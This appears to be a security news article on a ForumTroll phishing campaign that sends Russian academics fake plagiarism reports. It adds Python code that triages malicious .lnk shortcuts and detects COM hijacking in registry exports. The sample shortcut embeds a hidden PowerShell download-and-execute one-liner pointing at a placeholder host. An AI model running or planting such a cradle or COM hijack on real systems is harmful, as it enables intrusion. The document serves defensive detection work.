The Plagiarism Trap: How ForumTroll APT is Holding Academic Careers Hostage to Deploy Spyware
In October 2025, experts at Kaspersky Lab uncovered a new wave of targeted attacks attributed to the ForumTroll group. Whereas earlier campaigns primarily focused on organizations, this iteration shifted its attention to individuals—political scientists, international relations specialists, and economists affiliated with leading Russian universities and research institutions. The attackers used lure emails alleging the discovery of plagiarism and inviting recipients to download a supposed “verification report.”
The messages were sent from the address support@e-library[.]wiki. The domain e-library[.]wiki hosted a counterfeit website that closely mimicked the design of the legitimate eLibrary digital library (the genuine site being elibrary.ru). Each email contained a personalized link to access the report; clicking it triggered the download of a ZIP archive named after the recipient’s full name, reinforcing the impression of a targeted and “official” inquiry.
Inside the archive were a folder named .Thumbs containing numerous ordinary image files with Russian-language titles, alongside a shortcut (.lnk) file also bearing the recipient’s name. Researchers believe the images were included as a decoy to make the archive appear less suspicious. When the shortcut was opened, a PowerShell script executed, downloading and launching the malicious payload. At the same time, a decoy PDF was displayed—a blurred “report” from a plagiarism-checking system that contained virtually no meaningful information and served solely to mask the infection.
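The delivery step above hinges on what the shortcut actually runs, and that is recoverable from the .lnk file itself without opening it. The following added example (not code from the Kaspersky report or the ForumTroll toolset) parses the Shell Link binary format (MS-SHLLINK) to pull out the target and the command-line arguments, then flags the traits a PowerShell download-and-launch shortcut shows: a script host as the target, a hidden window, profile and execution-policy bypass switches, a download cradle, and an embedded URL. The sample shortcut it builds, including its relative path, its arguments and the example.invalid URL, is constructed for illustration and is not the campaign's artefact.

```python
"""Offline triage of a Windows shortcut (.lnk, MS-SHLLINK binary format).

Added example: reads the ShellLinkHeader and StringData sections and flags the
patterns a PowerShell download-and-launch shortcut exhibits. The sample .lnk
built at the bottom is constructed here; it is not the campaign's file.
"""
import re
import struct

# HeaderSize (0x4C) followed by the Shell Link CLSID 00021401-0000-0000-C000-000000000046
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1) that this parser needs
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
SW_SHOWMINNOACTIVE = 7  # window starts minimised and never takes focus

STRING_FIELDS = (  # StringData order is fixed by the specification
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags, ShowCommand and the StringData fields of a .lnk."""
    if len(data) < 76 or data[:20] != LNK_MAGIC:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = 76
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (u16) then the item IDs
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize (u32) covers the whole structure
        pos += struct.unpack_from("<I", data, pos)[0]
    info = {"flags": flags, "show_command": show_command}
    for flag, name in STRING_FIELDS:  # u16 character count + string, no terminator
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            info[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            info[name] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return info


HOST_PATTERN = r"powershell|pwsh|cmd\.exe|mshta|wscript|cscript|rundll32|conhost"
ARG_PATTERNS = (  # (regex over the arguments, finding)
    (r"-w(indowstyle)?\s+h(idden)?\b", "hidden PowerShell window"),
    (r"-nop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass", "profile/execution-policy bypass"),
    (r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", "base64-encoded command"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|\bcurl\b|bitsadmin",
     "download cradle"),
    (r"\biex\b|invoke-expression", "Invoke-Expression of fetched content"),
    (r"https?://", "embedded URL"),
)


def triage_lnk(data: bytes) -> list:
    """Return human-readable findings; an empty list means nothing stood out."""
    info = parse_lnk(data)
    findings = []
    target = info.get("relative_path", "") + " " + info.get("icon_location", "")
    args = info.get("arguments", "")
    if re.search(HOST_PATTERN, target, re.I):
        findings.append("target is a script host or LOLBin")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand hides the console window")
    if len(args) > 260:  # the Properties dialog shows only the first 260 characters
        findings.append("arguments exceed 260 chars (truncated in the Properties dialog)")
    for pattern, why in ARG_PATTERNS:
        if re.search(pattern, args, re.I):
            findings.append(why)
    return findings


def build_lnk(relative_path: str, arguments: str, show_command: int = SW_SHOWMINNOACTIVE) -> bytes:
    """Construct a minimal Unicode .lnk (with a dummy IDList) for testing only."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = (LNK_MAGIC + struct.pack("<II", flags, 0) + bytes(24)      # flags, attributes, 3 FILETIMEs
              + struct.pack("<III", 0, 0, show_command) + bytes(12))   # size, icon, show, reserved
    id_list = struct.pack("<H", 4) + b"\x1f\x50" + struct.pack("<H", 0)  # one ItemID + terminator
    body = struct.pack("<H", len(id_list)) + id_list
    for s in (relative_path, arguments):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


# Constructed sample modelled on the lure described above; the URL is a placeholder.
SAMPLE_ARGS = ("-nop -w hidden -ep bypass -c \"iex (New-Object Net.WebClient)"
               ".DownloadString('https://example.invalid/report')\"")
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", SAMPLE_ARGS)

if __name__ == "__main__":
    for finding in triage_lnk(SAMPLE_LNK):
        print("-", finding)
```

Run it against a real shortcut with `triage_lnk(open(path, "rb").read())`; the parser deliberately skips the LinkTargetIDList and LinkInfo blocks, so a shortcut whose target is expressed only as an IDList (common in malicious samples) will still yield its arguments, and the arguments alone usually carry the verdict.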
To establish persistence, the attackers employed COM hijacking. The downloaded DLL was saved within the user’s profile and registered in the registry as the server for a COM class, so that the DLL is loaded whenever a legitimate process instantiates that class; this keeps the implant running across reboots without relying on a conventional autostart entry. According to the report, the final payload was the commercial Tuoni framework, which is used legitimately for security testing but was repurposed here to grant remote access to victims’ devices and enable subsequent activity within their networks.
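COM hijacking works because Windows merges HKCU\Software\Classes over HKLM\Software\Classes when it resolves a class identifier, so an unprivileged user can point an existing CLSID's InprocServer32 at a DLL under their own profile and have it loaded by whichever process next instantiates that class. The following added example (not code from the Kaspersky report) shows the corresponding hunt: it parses two registry exports and flags per-user COM server registrations that shadow a machine-wide one or that load from a user-writable path. The exports, the CLSIDs and the file paths in it are constructed placeholders, not indicators from the campaign.

```python
"""Offline triage of per-user COM registrations exported with reg.exe.

Added example, not the report's code. Collect on the host as the user being
examined (reg.exe writes UTF-16LE, so open the files with encoding="utf-16"):
    reg export HKCU\Software\Classes\CLSID hkcu_clsid.reg /y
    reg export HKLM\Software\Classes\CLSID hklm_clsid.reg /y
The two exports embedded below are constructed; CLSIDs and paths are placeholders.
"""
import re

SERVER_SUBKEYS = ("inprocserver32", "localserver32", "treatas")
USER_WRITABLE = re.compile(
    r"\\users\\|%(appdata|localappdata|userprofile|temp|tmp)%|\\programdata\\", re.I)
# [HIVE\Software\Classes\CLSID\{guid}\Subkey] as written by reg export
KEY_RE = re.compile(
    r"^\[(HKEY_[A-Z_]+)\\software\\classes\\clsid\\(\{[0-9a-f-]{36}\})\\([a-z0-9]+)\]$", re.I)


def parse_reg_export(text: str) -> dict:
    """Map (hive, clsid, subkey) -> default value of each COM server subkey."""
    servers = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            m = KEY_RE.match(line)
            current = (m.group(1).upper(), m.group(2).lower(), m.group(3).lower()) if m else None
        elif current and current[2] in SERVER_SUBKEYS and line.startswith("@="):
            value = line[2:]
            if value.startswith('"') and value.endswith('"'):
                value = re.sub(r"\\(.)", r"\1", value[1:-1])  # undo reg.exe escaping of \ and "
            servers[current] = value
    return servers


def find_com_hijacks(hkcu_export: str, hklm_export: str) -> list:
    """Return per-user COM server entries worth a closer look, with the reasons."""
    hkcu = parse_reg_export(hkcu_export)
    hklm = parse_reg_export(hklm_export)
    machine = {(clsid, sub): path for (hive, clsid, sub), path in hklm.items()
               if hive == "HKEY_LOCAL_MACHINE"}
    findings = []
    for (hive, clsid, sub), path in hkcu.items():
        if hive != "HKEY_CURRENT_USER":
            continue
        reasons = []
        if (clsid, sub) in machine:  # the HKCU key wins the merge and silently replaces this
            reasons.append("shadows HKLM registration " + machine[(clsid, sub)])
        if USER_WRITABLE.search(path):
            reasons.append("server lives in a user-writable path")
        if reasons:
            findings.append({"clsid": clsid, "subkey": sub, "server": path, "reasons": reasons})
    return findings


# Constructed exports: one CLSID is registered machine-wide and overridden per user
# from the roaming profile; a second is a per-user-only registration.
HKCU_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-2222-3333-4444-555555555555}]

[HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32]
@="C:\\Users\\alice\\AppData\\Roaming\\Updater\\upd.dll"
"ThreadingModel"="Apartment"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{66666666-7777-8888-9999-000000000000}\InprocServer32]
@="C:\\Users\\alice\\AppData\\Local\\Programs\\NoteApp\\shellext.dll"
"ThreadingModel"="Apartment"
"""

HKLM_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11111111-2222-3333-4444-555555555555}]
@="Sample Shell Extension"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32]
@="C:\\Windows\\System32\\sampleext.dll"
"ThreadingModel"="Apartment"
"""

if __name__ == "__main__":
    for hit in find_com_hijacks(HKCU_EXPORT, HKLM_EXPORT):
        print(hit["clsid"], hit["subkey"], hit["server"])
        for reason in hit["reasons"]:
            print("   ", reason)
```

The first hit, a per-user entry that both shadows a machine-wide class and loads from the profile, is the shape of the persistence described above and should be pulled for analysis; the second, a user-profile DLL with no HKLM counterpart, is what a per-user application install also looks like, so it is a lead to verify against installed software rather than a verdict. When the HKLM side was exported from HKEY_CLASSES_ROOT instead, adjust KEY_RE to that key prefix.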
Kaspersky Lab also highlights the meticulous preparation of the attackers’ infrastructure. The malicious domain was registered as early as March 2025, while artifacts on the fake website indicate preparatory work dating back to at least December 2024. The attackers limited repeated downloads to hinder analysis and displayed different messages depending on the operating system, encouraging users to retry from Windows. Command-and-control servers were hosted within the fastly.net network. At the time of publication, the fraudulent site had been taken down.
Experts estimate that ForumTroll has been targeting individuals in Russia and Belarus since at least 2022. Kaspersky researcher Georgy Kucherin warns that academics are particularly vulnerable because their contact information is publicly available, and that emails accusing them of plagiarism can provoke anxiety and prompt rash actions. To mitigate the risk, he advises deploying security software on all devices and carefully verifying senders and links before opening attachments or following URLs.